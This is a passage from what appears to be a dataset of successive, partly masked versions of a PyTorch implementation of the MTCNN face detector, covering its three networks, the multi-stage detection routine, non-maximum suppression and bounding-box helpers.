dtype=torch.int64, device=device)\n max_coordinate = boxes.max()\n offsets = idxs.to(boxes) * (max_coordinate + 1)\n boxes_for_nms = boxes + offsets[:, None]\n boxes_for_nms = boxes_for_nms.cpu().numpy()\n scores = scores.cpu().numpy()\n keep = nms_numpy(boxes_for_nms, scores, threshold, method)\n return torch.as_tensor(keep, dtype=torch.long, device=device)\n\n\ndef pad(boxes, w, h):\n boxes = boxes.trunc().int().cpu().numpy()\n x = boxes[:, 0]\n y = boxes[:, 1]\n ex = boxes[:, 2]\n ey = boxes[:, 3]\n x[x < 1] = 1\n y[y < 1] = 1\n ex[ex > w] = w\n ey[ey > h] = h\n return y, ey, x, ex\n\n\n<mask token>\n\n\ndef imresample(img, sz):\n 
im_data = interpolate(img, size=sz, mode='area')\n return im_data\n",
"step-4": "<mask token>\n\n\nclass MTCNN:\n\n def __init__(self, device=None, model=None):\n if device is None:\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n self.device = device\n url = 'https://github.com/deepware/dFace/raw/master/models/mtcnn.pt'\n if model is None:\n model = torch.hub.load_state_dict_from_url(url)\n else:\n model = torch.load(model, map_location=device)\n self.pnet = PNet().to(device)\n self.rnet = RNet().to(device)\n self.onet = ONet().to(device)\n self.pnet.load_state_dict(model['pnet'])\n self.rnet.load_state_dict(model['rnet'])\n self.onet.load_state_dict(model['onet'])\n\n def detect(self, imgs, minsize=None):\n if len(imgs) == 0:\n return []\n if isinstance(imgs[0], np.ndarray):\n h, w = imgs[0].shape[:2]\n else:\n w, h = imgs[0].size\n if minsize is None:\n minsize = max(96 * min(w, h) / 1080, 40)\n boxes, points = [], []\n with torch.no_grad():\n batches = [imgs[i:i + 10] for i in range(0, len(imgs), 10)]\n for batch in batches:\n batch_boxes, batch_points = detect_face(batch, minsize,\n self.pnet, self.rnet, self.onet, [0.7, 0.8, 0.9], 0.709,\n self.device)\n boxes += list(batch_boxes)\n points += list(batch_points)\n result = []\n for box, point in zip(boxes, points):\n box = np.array(box)\n point = np.array(point)\n if len(box) == 0:\n result.append(None)\n else:\n result.append((box[:, :4], box[:, 4], point))\n return result\n\n\ndef empty_cache(device):\n if 'cuda' in device:\n with torch.cuda.device(device):\n torch.cuda.empty_cache()\n\n\nclass PNet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 10, kernel_size=3)\n self.prelu1 = nn.PReLU(10)\n self.pool1 = nn.MaxPool2d(2, 2, ceil_mode=True)\n self.conv2 = nn.Conv2d(10, 16, kernel_size=3)\n self.prelu2 = nn.PReLU(16)\n self.conv3 = nn.Conv2d(16, 32, kernel_size=3)\n self.prelu3 = nn.PReLU(32)\n self.conv4_1 = nn.Conv2d(32, 2, kernel_size=1)\n self.softmax4_1 = nn.Softmax(dim=1)\n self.conv4_2 = nn.Conv2d(32, 4, kernel_size=1)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n a = self.conv4_1(x)\n a = self.softmax4_1(a)\n b = self.conv4_2(x)\n return b, a\n\n\nclass RNet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 28, kernel_size=3)\n self.prelu1 = nn.PReLU(28)\n self.pool1 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv2 = nn.Conv2d(28, 48, kernel_size=3)\n self.prelu2 = nn.PReLU(48)\n self.pool2 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv3 = nn.Conv2d(48, 64, kernel_size=2)\n self.prelu3 = nn.PReLU(64)\n self.dense4 = nn.Linear(576, 128)\n self.prelu4 = nn.PReLU(128)\n self.dense5_1 = nn.Linear(128, 2)\n self.softmax5_1 = nn.Softmax(dim=1)\n self.dense5_2 = nn.Linear(128, 4)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.pool2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n x = x.permute(0, 3, 2, 1).contiguous()\n x = self.dense4(x.view(x.shape[0], -1))\n x = self.prelu4(x)\n a = self.dense5_1(x)\n a = self.softmax5_1(a)\n b = self.dense5_2(x)\n return b, a\n\n\nclass ONet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 32, kernel_size=3)\n self.prelu1 = nn.PReLU(32)\n self.pool1 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv2 = nn.Conv2d(32, 64, kernel_size=3)\n self.prelu2 = nn.PReLU(64)\n self.pool2 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv3 = 
nn.Conv2d(64, 64, kernel_size=3)\n self.prelu3 = nn.PReLU(64)\n self.pool3 = nn.MaxPool2d(2, 2, ceil_mode=True)\n self.conv4 = nn.Conv2d(64, 128, kernel_size=2)\n self.prelu4 = nn.PReLU(128)\n self.dense5 = nn.Linear(1152, 256)\n self.prelu5 = nn.PReLU(256)\n self.dense6_1 = nn.Linear(256, 2)\n self.softmax6_1 = nn.Softmax(dim=1)\n self.dense6_2 = nn.Linear(256, 4)\n self.dense6_3 = nn.Linear(256, 10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.pool2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n x = self.pool3(x)\n x = self.conv4(x)\n x = self.prelu4(x)\n x = x.permute(0, 3, 2, 1).contiguous()\n x = self.dense5(x.view(x.shape[0], -1))\n x = self.prelu5(x)\n a = self.dense6_1(x)\n a = self.softmax6_1(a)\n b = self.dense6_2(x)\n c = self.dense6_3(x)\n return b, c, a\n\n\ndef detect_face(imgs, minsize, pnet, rnet, onet, threshold, factor, device):\n if isinstance(imgs, (np.ndarray, torch.Tensor)):\n imgs = torch.as_tensor(imgs, device=device)\n if len(imgs.shape) == 3:\n imgs = imgs.unsqueeze(0)\n else:\n if not isinstance(imgs, (list, tuple)):\n imgs = [imgs]\n if any(img.size != imgs[0].size for img in imgs):\n raise Exception(\n 'MTCNN batch processing only compatible with equal-dimension images.'\n )\n imgs = np.stack([np.uint8(img) for img in imgs])\n imgs = torch.as_tensor(imgs, device=device)\n model_dtype = next(pnet.parameters()).dtype\n imgs = imgs.permute(0, 3, 1, 2).type(model_dtype)\n batch_size = len(imgs)\n h, w = imgs.shape[2:4]\n m = 12.0 / minsize\n minl = min(h, w)\n minl = minl * m\n scale_i = m\n scales = []\n while minl >= 12:\n scales.append(scale_i)\n scale_i = scale_i * factor\n minl = minl * factor\n boxes = []\n image_inds = []\n all_inds = []\n all_i = 0\n for scale in scales:\n im_data = imresample(imgs, (int(h * scale + 1), int(w * scale + 1)))\n im_data = (im_data - 127.5) * 0.0078125\n reg, probs = pnet(im_data)\n empty_cache(device)\n boxes_scale, image_inds_scale = generateBoundingBox(reg, probs[:, 1\n ], scale, threshold[0])\n boxes.append(boxes_scale)\n image_inds.append(image_inds_scale)\n all_inds.append(all_i + image_inds_scale)\n all_i += batch_size\n boxes = torch.cat(boxes, dim=0)\n image_inds = torch.cat(image_inds, dim=0).cpu()\n all_inds = torch.cat(all_inds, dim=0)\n pick = batched_nms(boxes[:, :4], boxes[:, 4], all_inds, 0.5)\n boxes, image_inds = boxes[pick], image_inds[pick]\n pick = batched_nms(boxes[:, :4], boxes[:, 4], image_inds, 0.7)\n boxes, image_inds = boxes[pick], image_inds[pick]\n regw = boxes[:, 2] - boxes[:, 0]\n regh = boxes[:, 3] - boxes[:, 1]\n qq1 = boxes[:, 0] + boxes[:, 5] * regw\n qq2 = boxes[:, 1] + boxes[:, 6] * regh\n qq3 = boxes[:, 2] + boxes[:, 7] * regw\n qq4 = boxes[:, 3] + boxes[:, 8] * regh\n boxes = torch.stack([qq1, qq2, qq3, qq4, boxes[:, 4]]).permute(1, 0)\n boxes = rerec(boxes)\n y, ey, x, ex = pad(boxes, w, h)\n if len(boxes) > 0:\n im_data = []\n for k in range(len(y)):\n if ey[k] > y[k] - 1 and ex[k] > x[k] - 1:\n img_k = imgs[image_inds[k], :, y[k] - 1:ey[k], x[k] - 1:ex[k]\n ].unsqueeze(0)\n im_data.append(imresample(img_k, (24, 24)))\n im_data = torch.cat(im_data, dim=0)\n im_data = (im_data - 127.5) * 0.0078125\n out = []\n for batch in im_data.split(2000):\n out += [rnet(batch)]\n z = list(zip(*out))\n out = torch.cat(z[0]), torch.cat(z[1])\n empty_cache(device)\n out0 = out[0].permute(1, 0)\n out1 = out[1].permute(1, 0)\n score = out1[1, :]\n ipass = score > threshold[1]\n boxes = torch.cat((boxes[ipass, :4], 
score[ipass].unsqueeze(1)), dim=1)\n image_inds = image_inds[ipass]\n mv = out0[:, ipass].permute(1, 0)\n pick = batched_nms(boxes[:, :4], boxes[:, 4], image_inds, 0.7)\n boxes, image_inds, mv = boxes[pick], image_inds[pick], mv[pick]\n boxes = bbreg(boxes, mv)\n boxes = rerec(boxes)\n points = torch.zeros(0, 5, 2, device=device)\n if len(boxes) > 0:\n y, ey, x, ex = pad(boxes, w, h)\n im_data = []\n for k in range(len(y)):\n if ey[k] > y[k] - 1 and ex[k] > x[k] - 1:\n img_k = imgs[image_inds[k], :, y[k] - 1:ey[k], x[k] - 1:ex[k]\n ].unsqueeze(0)\n im_data.append(imresample(img_k, (48, 48)))\n im_data = torch.cat(im_data, dim=0)\n im_data = (im_data - 127.5) * 0.0078125\n out = []\n for batch in im_data.split(500):\n out += [onet(batch)]\n z = list(zip(*out))\n out = torch.cat(z[0]), torch.cat(z[1]), torch.cat(z[2])\n empty_cache(device)\n out0 = out[0].permute(1, 0)\n out1 = out[1].permute(1, 0)\n out2 = out[2].permute(1, 0)\n score = out2[1, :]\n points = out1\n ipass = score > threshold[2]\n points = points[:, ipass]\n boxes = torch.cat((boxes[ipass, :4], score[ipass].unsqueeze(1)), dim=1)\n image_inds = image_inds[ipass]\n mv = out0[:, ipass].permute(1, 0)\n w_i = boxes[:, 2] - boxes[:, 0] + 1\n h_i = boxes[:, 3] - boxes[:, 1] + 1\n points_x = w_i.repeat(5, 1) * points[:5, :] + boxes[:, 0].repeat(5, 1\n ) - 1\n points_y = h_i.repeat(5, 1) * points[5:10, :] + boxes[:, 1].repeat(5, 1\n ) - 1\n points = torch.stack((points_x, points_y)).permute(2, 1, 0)\n boxes = bbreg(boxes, mv)\n pick = batched_nms_numpy(boxes[:, :4], boxes[:, 4], image_inds, 0.7,\n 'Min')\n boxes, image_inds, points = boxes[pick], image_inds[pick], points[pick]\n boxes = boxes.cpu().numpy()\n points = points.cpu().numpy()\n batch_boxes = []\n batch_points = []\n for b_i in range(batch_size):\n b_i_inds = np.where(image_inds == b_i)\n batch_boxes.append(boxes[b_i_inds].copy())\n batch_points.append(points[b_i_inds].copy())\n batch_boxes, batch_points = np.array(batch_boxes), np.array(batch_points)\n empty_cache(device)\n return batch_boxes, batch_points\n\n\ndef bbreg(boundingbox, reg):\n if reg.shape[1] == 1:\n reg = torch.reshape(reg, (reg.shape[2], reg.shape[3]))\n w = boundingbox[:, 2] - boundingbox[:, 0] + 1\n h = boundingbox[:, 3] - boundingbox[:, 1] + 1\n b1 = boundingbox[:, 0] + reg[:, 0] * w\n b2 = boundingbox[:, 1] + reg[:, 1] * h\n b3 = boundingbox[:, 2] + reg[:, 2] * w\n b4 = boundingbox[:, 3] + reg[:, 3] * h\n boundingbox[:, :4] = torch.stack([b1, b2, b3, b4]).permute(1, 0)\n return boundingbox\n\n\ndef generateBoundingBox(reg, probs, scale, thresh):\n stride = 2\n cellsize = 12\n reg = reg.permute(1, 0, 2, 3)\n mask = probs >= thresh\n mask_inds = mask.nonzero(as_tuple=False)\n image_inds = mask_inds[:, 0]\n score = probs[mask]\n reg = reg[:, mask].permute(1, 0)\n bb = mask_inds[:, 1:].type(reg.dtype).flip(1)\n q1 = ((stride * bb + 1) / scale).floor()\n q2 = ((stride * bb + cellsize - 1 + 1) / scale).floor()\n boundingbox = torch.cat([q1, q2, score.unsqueeze(1), reg], dim=1)\n return boundingbox, image_inds\n\n\ndef nms_numpy(boxes, scores, threshold, method):\n if boxes.size == 0:\n return np.empty((0, 3))\n x1 = boxes[:, 0].copy()\n y1 = boxes[:, 1].copy()\n x2 = boxes[:, 2].copy()\n y2 = boxes[:, 3].copy()\n s = scores\n area = (x2 - x1 + 1) * (y2 - y1 + 1)\n I = np.argsort(s)\n pick = np.zeros_like(s, dtype=np.int16)\n counter = 0\n while I.size > 0:\n i = I[-1]\n pick[counter] = i\n counter += 1\n idx = I[0:-1]\n xx1 = np.maximum(x1[i], x1[idx]).copy()\n yy1 = np.maximum(y1[i], y1[idx]).copy()\n xx2 = 
np.minimum(x2[i], x2[idx]).copy()\n yy2 = np.minimum(y2[i], y2[idx]).copy()\n w = np.maximum(0.0, xx2 - xx1 + 1).copy()\n h = np.maximum(0.0, yy2 - yy1 + 1).copy()\n inter = w * h\n if method == 'Min':\n o = inter / np.minimum(area[i], area[idx])\n else:\n o = inter / (area[i] + area[idx] - inter)\n I = I[np.where(o <= threshold)]\n pick = pick[:counter].copy()\n return pick\n\n\ndef batched_nms_numpy(boxes, scores, idxs, threshold, method):\n device = boxes.device\n if boxes.numel() == 0:\n return torch.empty((0,), dtype=torch.int64, device=device)\n max_coordinate = boxes.max()\n offsets = idxs.to(boxes) * (max_coordinate + 1)\n boxes_for_nms = boxes + offsets[:, None]\n boxes_for_nms = boxes_for_nms.cpu().numpy()\n scores = scores.cpu().numpy()\n keep = nms_numpy(boxes_for_nms, scores, threshold, method)\n return torch.as_tensor(keep, dtype=torch.long, device=device)\n\n\ndef pad(boxes, w, h):\n boxes = boxes.trunc().int().cpu().numpy()\n x = boxes[:, 0]\n y = boxes[:, 1]\n ex = boxes[:, 2]\n ey = boxes[:, 3]\n x[x < 1] = 1\n y[y < 1] = 1\n ex[ex > w] = w\n ey[ey > h] = h\n return y, ey, x, ex\n\n\ndef rerec(bboxA):\n h = bboxA[:, 3] - bboxA[:, 1]\n w = bboxA[:, 2] - bboxA[:, 0]\n l = torch.max(w, h)\n bboxA[:, 0] = bboxA[:, 0] + w * 0.5 - l * 0.5\n bboxA[:, 1] = bboxA[:, 1] + h * 0.5 - l * 0.5\n bboxA[:, 2:4] = bboxA[:, :2] + l.repeat(2, 1).permute(1, 0)\n return bboxA\n\n\ndef imresample(img, sz):\n im_data = interpolate(img, size=sz, mode='area')\n return im_data\n",
"step-5": "import numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.nn.functional import interpolate\nfrom torchvision.ops.boxes import batched_nms\n\n\nclass MTCNN():\n\tdef __init__(self, device=None, model=None):\n\t\tif device is None:\n\t\t\tdevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\t\tself.device = device\n\n\t\turl = 'https://github.com/deepware/dFace/raw/master/models/mtcnn.pt'\n\t\tif model is None:\n\t\t\tmodel = torch.hub.load_state_dict_from_url(url)\n\t\telse:\n\t\t\tmodel = torch.load(model, map_location=device)\n\n\t\tself.pnet = PNet().to(device)\n\t\tself.rnet = RNet().to(device)\n\t\tself.onet = ONet().to(device)\n\n\t\tself.pnet.load_state_dict(model['pnet'])\n\t\tself.rnet.load_state_dict(model['rnet'])\n\t\tself.onet.load_state_dict(model['onet'])\n\n\n\tdef detect(self, imgs, minsize=None):\n\t\tif len(imgs) == 0:\n\t\t\treturn []\n\n\t\tif isinstance(imgs[0], np.ndarray):\n\t\t\th, w = imgs[0].shape[:2]\n\t\telse:\n\t\t\tw, h = imgs[0].size\n\n\t\tif minsize is None:\n\t\t\tminsize = max(96 * min(w, h)/1080, 40)\n\n\t\tboxes, points = [], []\n\n\t\twith torch.no_grad():\n\t\t\tbatches = [imgs[i:i+10] for i in range(0, len(imgs), 10)]\n\t\t\tfor batch in batches:\n\t\t\t\tbatch_boxes, batch_points = detect_face(\n\t\t\t\t\tbatch, minsize, self.pnet, self.rnet, self.onet,\n\t\t\t\t\t[0.7, 0.8, 0.9], 0.709, self.device)\n\t\t\t\tboxes += list(batch_boxes)\n\t\t\t\tpoints += list(batch_points)\n\n\t\tresult = []\n\t\tfor box, point in zip(boxes, points):\n\t\t\tbox = np.array(box)\n\t\t\tpoint = np.array(point)\n\t\t\tif len(box) == 0:\n\t\t\t\tresult.append(None)\n\t\t\telse:\n\t\t\t\tresult.append((box[:, :4], box[:, 4], point))\n\t\treturn result\n\n\ndef empty_cache(device):\n\tif 'cuda' in device:\n\t\twith torch.cuda.device(device):\n\t\t\ttorch.cuda.empty_cache()\n\n\nclass PNet(nn.Module):\n\n\tdef __init__(self):\n\t\tsuper().__init__()\n\n\t\tself.conv1 = nn.Conv2d(3, 10, kernel_size=3)\n\t\tself.prelu1 = nn.PReLU(10)\n\t\tself.pool1 = nn.MaxPool2d(2, 2, ceil_mode=True)\n\t\tself.conv2 = nn.Conv2d(10, 16, kernel_size=3)\n\t\tself.prelu2 = nn.PReLU(16)\n\t\tself.conv3 = nn.Conv2d(16, 32, kernel_size=3)\n\t\tself.prelu3 = nn.PReLU(32)\n\t\tself.conv4_1 = nn.Conv2d(32, 2, kernel_size=1)\n\t\tself.softmax4_1 = nn.Softmax(dim=1)\n\t\tself.conv4_2 = nn.Conv2d(32, 4, kernel_size=1)\n\n\tdef forward(self, x):\n\t\tx = self.conv1(x)\n\t\tx = self.prelu1(x)\n\t\tx = self.pool1(x)\n\t\tx = self.conv2(x)\n\t\tx = self.prelu2(x)\n\t\tx = self.conv3(x)\n\t\tx = self.prelu3(x)\n\t\ta = self.conv4_1(x)\n\t\ta = self.softmax4_1(a)\n\t\tb = self.conv4_2(x)\n\t\treturn b, a\n\n\nclass RNet(nn.Module):\n\n\tdef __init__(self):\n\t\tsuper().__init__()\n\n\t\tself.conv1 = nn.Conv2d(3, 28, kernel_size=3)\n\t\tself.prelu1 = nn.PReLU(28)\n\t\tself.pool1 = nn.MaxPool2d(3, 2, ceil_mode=True)\n\t\tself.conv2 = nn.Conv2d(28, 48, kernel_size=3)\n\t\tself.prelu2 = nn.PReLU(48)\n\t\tself.pool2 = nn.MaxPool2d(3, 2, ceil_mode=True)\n\t\tself.conv3 = nn.Conv2d(48, 64, kernel_size=2)\n\t\tself.prelu3 = nn.PReLU(64)\n\t\tself.dense4 = nn.Linear(576, 128)\n\t\tself.prelu4 = nn.PReLU(128)\n\t\tself.dense5_1 = nn.Linear(128, 2)\n\t\tself.softmax5_1 = nn.Softmax(dim=1)\n\t\tself.dense5_2 = nn.Linear(128, 4)\n\n\tdef forward(self, x):\n\t\tx = self.conv1(x)\n\t\tx = self.prelu1(x)\n\t\tx = self.pool1(x)\n\t\tx = self.conv2(x)\n\t\tx = self.prelu2(x)\n\t\tx = self.pool2(x)\n\t\tx = self.conv3(x)\n\t\tx = self.prelu3(x)\n\t\tx = x.permute(0, 3, 2, 1).contiguous()\n\t\tx = 
self.dense4(x.view(x.shape[0], -1))\n\t\tx = self.prelu4(x)\n\t\ta = self.dense5_1(x)\n\t\ta = self.softmax5_1(a)\n\t\tb = self.dense5_2(x)\n\t\treturn b, a\n\n\nclass ONet(nn.Module):\n\n\tdef __init__(self):\n\t\tsuper().__init__()\n\n\t\tself.conv1 = nn.Conv2d(3, 32, kernel_size=3)\n\t\tself.prelu1 = nn.PReLU(32)\n\t\tself.pool1 = nn.MaxPool2d(3, 2, ceil_mode=True)\n\t\tself.conv2 = nn.Conv2d(32, 64, kernel_size=3)\n\t\tself.prelu2 = nn.PReLU(64)\n\t\tself.pool2 = nn.MaxPool2d(3, 2, ceil_mode=True)\n\t\tself.conv3 = nn.Conv2d(64, 64, kernel_size=3)\n\t\tself.prelu3 = nn.PReLU(64)\n\t\tself.pool3 = nn.MaxPool2d(2, 2, ceil_mode=True)\n\t\tself.conv4 = nn.Conv2d(64, 128, kernel_size=2)\n\t\tself.prelu4 = nn.PReLU(128)\n\t\tself.dense5 = nn.Linear(1152, 256)\n\t\tself.prelu5 = nn.PReLU(256)\n\t\tself.dense6_1 = nn.Linear(256, 2)\n\t\tself.softmax6_1 = nn.Softmax(dim=1)\n\t\tself.dense6_2 = nn.Linear(256, 4)\n\t\tself.dense6_3 = nn.Linear(256, 10)\n\n\tdef forward(self, x):\n\t\tx = self.conv1(x)\n\t\tx = self.prelu1(x)\n\t\tx = self.pool1(x)\n\t\tx = self.conv2(x)\n\t\tx = self.prelu2(x)\n\t\tx = self.pool2(x)\n\t\tx = self.conv3(x)\n\t\tx = self.prelu3(x)\n\t\tx = self.pool3(x)\n\t\tx = self.conv4(x)\n\t\tx = self.prelu4(x)\n\t\tx = x.permute(0, 3, 2, 1).contiguous()\n\t\tx = self.dense5(x.view(x.shape[0], -1))\n\t\tx = self.prelu5(x)\n\t\ta = self.dense6_1(x)\n\t\ta = self.softmax6_1(a)\n\t\tb = self.dense6_2(x)\n\t\tc = self.dense6_3(x)\n\t\treturn b, c, a\n\n\ndef detect_face(imgs, minsize, pnet, rnet, onet, threshold, factor, device):\n\tif isinstance(imgs, (np.ndarray, torch.Tensor)):\n\t\timgs = torch.as_tensor(imgs, device=device)\n\t\tif len(imgs.shape) == 3:\n\t\t\timgs = imgs.unsqueeze(0)\n\telse:\n\t\tif not isinstance(imgs, (list, tuple)):\n\t\t\timgs = [imgs]\n\t\tif any(img.size != imgs[0].size for img in imgs):\n\t\t\traise Exception(\"MTCNN batch processing only compatible with equal-dimension images.\")\n\t\timgs = np.stack([np.uint8(img) for img in imgs])\n\n\timgs = torch.as_tensor(imgs, device=device)\n\n\tmodel_dtype = next(pnet.parameters()).dtype\n\timgs = imgs.permute(0, 3, 1, 2).type(model_dtype)\n\n\tbatch_size = len(imgs)\n\th, w = imgs.shape[2:4]\n\tm = 12.0 / minsize\n\tminl = min(h, w)\n\tminl = minl * m\n\n\t# Create scale pyramid\n\tscale_i = m\n\tscales = []\n\twhile minl >= 12:\n\t\tscales.append(scale_i)\n\t\tscale_i = scale_i * factor\n\t\tminl = minl * factor\n\n\t# First stage\n\tboxes = []\n\timage_inds = []\n\tall_inds = []\n\tall_i = 0\n\tfor scale in scales:\n\t\tim_data = imresample(imgs, (int(h * scale + 1), int(w * scale + 1)))\n\t\tim_data = (im_data - 127.5) * 0.0078125\n\t\treg, probs = pnet(im_data)\n\t\tempty_cache(device)\n\t\tboxes_scale, image_inds_scale = generateBoundingBox(reg, probs[:, 1], scale, threshold[0])\n\t\tboxes.append(boxes_scale)\n\t\timage_inds.append(image_inds_scale)\n\t\tall_inds.append(all_i + image_inds_scale)\n\t\tall_i += batch_size\n\n\tboxes = torch.cat(boxes, dim=0)\n\timage_inds = torch.cat(image_inds, dim=0).cpu()\n\tall_inds = torch.cat(all_inds, dim=0)\n\n\t# NMS within each scale + image\n\tpick = batched_nms(boxes[:, :4], boxes[:, 4], all_inds, 0.5)\n\tboxes, image_inds = boxes[pick], image_inds[pick]\n\n\t# NMS within each image\n\tpick = batched_nms(boxes[:, :4], boxes[:, 4], image_inds, 0.7)\n\tboxes, image_inds = boxes[pick], image_inds[pick]\n\n\tregw = boxes[:, 2] - boxes[:, 0]\n\tregh = boxes[:, 3] - boxes[:, 1]\n\tqq1 = boxes[:, 0] + boxes[:, 5] * regw\n\tqq2 = boxes[:, 1] + boxes[:, 6] * 
regh\n\tqq3 = boxes[:, 2] + boxes[:, 7] * regw\n\tqq4 = boxes[:, 3] + boxes[:, 8] * regh\n\tboxes = torch.stack([qq1, qq2, qq3, qq4, boxes[:, 4]]).permute(1, 0)\n\tboxes = rerec(boxes)\n\ty, ey, x, ex = pad(boxes, w, h)\n\n\t# Second stage\n\tif len(boxes) > 0:\n\t\tim_data = []\n\t\tfor k in range(len(y)):\n\t\t\tif ey[k] > (y[k] - 1) and ex[k] > (x[k] - 1):\n\t\t\t\timg_k = imgs[image_inds[k], :, (y[k] - 1):ey[k], (x[k] - 1):ex[k]].unsqueeze(0)\n\t\t\t\tim_data.append(imresample(img_k, (24, 24)))\n\t\tim_data = torch.cat(im_data, dim=0)\n\t\tim_data = (im_data - 127.5) * 0.0078125\n\n\t\tout = []\n\t\tfor batch in im_data.split(2000):\n\t\t\tout += [rnet(batch)]\n\t\tz = list(zip(*out))\n\t\tout = (torch.cat(z[0]), torch.cat(z[1]))\n\t\tempty_cache(device)\n\n\t\tout0 = out[0].permute(1, 0)\n\t\tout1 = out[1].permute(1, 0)\n\t\tscore = out1[1, :]\n\t\tipass = score > threshold[1]\n\t\tboxes = torch.cat((boxes[ipass, :4], score[ipass].unsqueeze(1)), dim=1)\n\t\timage_inds = image_inds[ipass]\n\t\tmv = out0[:, ipass].permute(1, 0)\n\n\t\t# NMS within each image\n\t\tpick = batched_nms(boxes[:, :4], boxes[:, 4], image_inds, 0.7)\n\t\tboxes, image_inds, mv = boxes[pick], image_inds[pick], mv[pick]\n\t\tboxes = bbreg(boxes, mv)\n\t\tboxes = rerec(boxes)\n\n\t# Third stage\n\tpoints = torch.zeros(0, 5, 2, device=device)\n\tif len(boxes) > 0:\n\t\ty, ey, x, ex = pad(boxes, w, h)\n\t\tim_data = []\n\t\tfor k in range(len(y)):\n\t\t\tif ey[k] > (y[k] - 1) and ex[k] > (x[k] - 1):\n\t\t\t\timg_k = imgs[image_inds[k], :, (y[k] - 1):ey[k], (x[k] - 1):ex[k]].unsqueeze(0)\n\t\t\t\tim_data.append(imresample(img_k, (48, 48)))\n\t\tim_data = torch.cat(im_data, dim=0)\n\t\tim_data = (im_data - 127.5) * 0.0078125\n\n\t\tout = []\n\t\tfor batch in im_data.split(500):\n\t\t\tout += [onet(batch)]\n\t\tz = list(zip(*out))\n\t\tout = (torch.cat(z[0]), torch.cat(z[1]), torch.cat(z[2]))\n\t\tempty_cache(device)\n\n\t\tout0 = out[0].permute(1, 0)\n\t\tout1 = out[1].permute(1, 0)\n\t\tout2 = out[2].permute(1, 0)\n\t\tscore = out2[1, :]\n\t\tpoints = out1\n\t\tipass = score > threshold[2]\n\t\tpoints = points[:, ipass]\n\t\tboxes = torch.cat((boxes[ipass, :4], score[ipass].unsqueeze(1)), dim=1)\n\t\timage_inds = image_inds[ipass]\n\t\tmv = out0[:, ipass].permute(1, 0)\n\n\t\tw_i = boxes[:, 2] - boxes[:, 0] + 1\n\t\th_i = boxes[:, 3] - boxes[:, 1] + 1\n\t\tpoints_x = w_i.repeat(5, 1) * points[:5, :] + boxes[:, 0].repeat(5, 1) - 1\n\t\tpoints_y = h_i.repeat(5, 1) * points[5:10, :] + boxes[:, 1].repeat(5, 1) - 1\n\t\tpoints = torch.stack((points_x, points_y)).permute(2, 1, 0)\n\t\tboxes = bbreg(boxes, mv)\n\n\t\t# NMS within each image using \"Min\" strategy\n\t\t# pick = batched_nms(boxes[:, :4], boxes[:, 4], image_inds, 0.7)\n\t\tpick = batched_nms_numpy(boxes[:, :4], boxes[:, 4], image_inds, 0.7, 'Min')\n\t\tboxes, image_inds, points = boxes[pick], image_inds[pick], points[pick]\n\n\tboxes = boxes.cpu().numpy()\n\tpoints = points.cpu().numpy()\n\n\tbatch_boxes = []\n\tbatch_points = []\n\tfor b_i in range(batch_size):\n\t\tb_i_inds = np.where(image_inds == b_i)\n\t\tbatch_boxes.append(boxes[b_i_inds].copy())\n\t\tbatch_points.append(points[b_i_inds].copy())\n\n\tbatch_boxes, batch_points = np.array(batch_boxes), np.array(batch_points)\n\tempty_cache(device)\n\n\treturn batch_boxes, batch_points\n\n\ndef bbreg(boundingbox, reg):\n\tif reg.shape[1] == 1:\n\t\treg = torch.reshape(reg, (reg.shape[2], reg.shape[3]))\n\n\tw = boundingbox[:, 2] - boundingbox[:, 0] + 1\n\th = boundingbox[:, 3] - boundingbox[:, 1] + 1\n\tb1 = 
boundingbox[:, 0] + reg[:, 0] * w\n\tb2 = boundingbox[:, 1] + reg[:, 1] * h\n\tb3 = boundingbox[:, 2] + reg[:, 2] * w\n\tb4 = boundingbox[:, 3] + reg[:, 3] * h\n\tboundingbox[:, :4] = torch.stack([b1, b2, b3, b4]).permute(1, 0)\n\n\treturn boundingbox\n\n\ndef generateBoundingBox(reg, probs, scale, thresh):\n\tstride = 2\n\tcellsize = 12\n\n\treg = reg.permute(1, 0, 2, 3)\n\n\tmask = probs >= thresh\n\tmask_inds = mask.nonzero(as_tuple=False)\n\timage_inds = mask_inds[:, 0]\n\tscore = probs[mask]\n\treg = reg[:, mask].permute(1, 0)\n\tbb = mask_inds[:, 1:].type(reg.dtype).flip(1)\n\tq1 = ((stride * bb + 1) / scale).floor()\n\tq2 = ((stride * bb + cellsize - 1 + 1) / scale).floor()\n\tboundingbox = torch.cat([q1, q2, score.unsqueeze(1), reg], dim=1)\n\treturn boundingbox, image_inds\n\n\ndef nms_numpy(boxes, scores, threshold, method):\n\tif boxes.size == 0:\n\t\treturn np.empty((0, 3))\n\n\tx1 = boxes[:, 0].copy()\n\ty1 = boxes[:, 1].copy()\n\tx2 = boxes[:, 2].copy()\n\ty2 = boxes[:, 3].copy()\n\ts = scores\n\tarea = (x2 - x1 + 1) * (y2 - y1 + 1)\n\n\tI = np.argsort(s)\n\tpick = np.zeros_like(s, dtype=np.int16)\n\tcounter = 0\n\twhile I.size > 0:\n\t\ti = I[-1]\n\t\tpick[counter] = i\n\t\tcounter += 1\n\t\tidx = I[0:-1]\n\n\t\txx1 = np.maximum(x1[i], x1[idx]).copy()\n\t\tyy1 = np.maximum(y1[i], y1[idx]).copy()\n\t\txx2 = np.minimum(x2[i], x2[idx]).copy()\n\t\tyy2 = np.minimum(y2[i], y2[idx]).copy()\n\n\t\tw = np.maximum(0.0, xx2 - xx1 + 1).copy()\n\t\th = 